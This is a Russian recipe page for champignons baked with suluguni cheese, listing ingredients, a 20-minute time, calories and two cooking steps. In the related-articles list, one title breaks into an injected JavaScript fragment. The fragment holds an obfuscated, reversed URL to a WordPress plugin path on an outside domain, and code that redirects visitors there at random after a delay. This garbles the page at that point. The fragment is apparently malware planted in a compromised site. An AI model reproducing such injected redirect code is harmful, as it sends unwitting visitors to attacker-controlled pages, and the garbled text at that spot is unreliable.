Минимум времени, всего два ингредиента — и вкусная осенняя закуска готова. Спешите попробовать, пока не закончился грибной сезон.
350 calories
Шампиньоны с сулугуни
Рецепт от шеф-повара ресторана «Казбек» Мамия Джоджуа.
Шампиньоны с сулугуни
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 минут
КОЛИЧЕСТВО ПОРЦИЙ:
1 порция
КАЛОРИЙНОСТЬ:
350 ккал
Сложность
Время
20 минут
Кол-во порций
1 порция
Калорийность
350 ккал
Ингредиенты
Грибы (шампиньоны)
150 г
Сыр (сулугуни)
85 г
Масло (растительное)
по вкусу
Соль
по вкусу
Перец (чёрный молотый)
по вкусу
Процесс приготовления
- Обжарьте шампиньоны на растительном масле с добавлением специй до полуготовности (около 8 минут).
- Затем выложите шампиньоны в форму, посыпьте тёртым сулугуни и запекайте в течение 10 минут в разогретой духовке при 180 градусах. Приятного аппетита!
Статьи по теме
Грибной бургер Balsamic Portoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobello
Ризотто с белыми грибами и сливками
3 лучших рецепта с лисичками
Тальолини с грибами